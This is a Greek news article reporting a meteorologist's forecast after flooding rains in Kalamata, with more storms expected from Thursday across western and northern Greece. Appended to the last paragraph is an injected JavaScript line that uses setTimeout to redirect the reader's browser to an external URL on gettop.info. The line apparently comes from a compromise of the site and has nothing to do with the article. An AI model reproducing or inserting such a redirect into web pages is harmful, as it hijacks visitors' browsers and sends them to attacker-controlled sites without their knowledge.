Νέα κακοκαιρία από την Πέμπτη

0
4

 

 

Σε ύφεση θα είναι μέχρι το βράδυ τα έντονα καιρικά φαινόμενα που έπληξαν την περιοχή της Καλαμάτας, σύμφωνα με τον διευθυντή του Εθνικού Μετεωρολογικού Κέντρου της ΕΜΥ Αντώνη Λάλο.

Ωστόσο, ο ίδιος τόνισε στο Αθηναϊκό Πρακτορείο ότι θα υπάρξει νέα επιδείνωση του καιρού, με βροχές και καταιγίδες, από τα χαράματα της Πέμπτης.

Ο κ. Λάλος ,σημειώσε ότι έπεσε μεγάλη ποσότητα νερού σε λίγες ώρες -υπολογίζεται πάνω από 100 χιλιοστά στην Καλαμάτα για έξι έως 12 ώρες- και είναι αναμενόμενο να δημιουργούνται πλημμυρικά φαινόμενα, που σε συνδυασμό με την ύπαρξη καμένων περιοχών και παρεμβάσεων ή παραλείψεων του ανθρώπινου παράγοντα δημιούργησαν τα προβλήματα.

Στην κεντρική και δυτική Μακεδονία, καθώς και σε ένας μέρος της Θεσσαλίας θα συνεχιστούν τα φαινόμενα όλη την ημέρα με μικρή ύφεση το βράδυ.

«Αυτές τις ώρες έχουν μετατοπιστεί οι καταιγίδες στην περιοχή της Λακωνίας, και του Αργολικού Κόλπου. Υπάρχει ύφεση στις δυτικές περιοχές ακόμη και στην Καλαμάτα που είχε σοβαρά προβλήματα. Η ύφεση θα διαρκέσει έως το βράδυ απόψε και θα ξαναρχίσει χαράματα να επιδεινώνεται ο καιρός με βροχές και καταιγίδες στη δυτική Ελλάδα», ανέφερε ο μετεωρολόγος.

«Η επιδείνωση θα ξεκινήσει από τα δυτικά και θα συνεχιστεί η κακοκαιρία σχεδόν όλη μέρα αύριο σε μια ζώνη από το Ιόνιο, τη δυτική και βόρεια Πελοπόννησο, τη δυτική και κεντρική Στερεά, τη Θεσσαλία, τη δυτική και κεντρική Μακεδονία. Στην Αττική αύριο θα σημειωθούν κάποιες βροχές και καταιγίδες αλλά φαίνεται ότι η περιοχή δεν θα επηρεαστεί ιδιαίτερα», κατέληξε. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here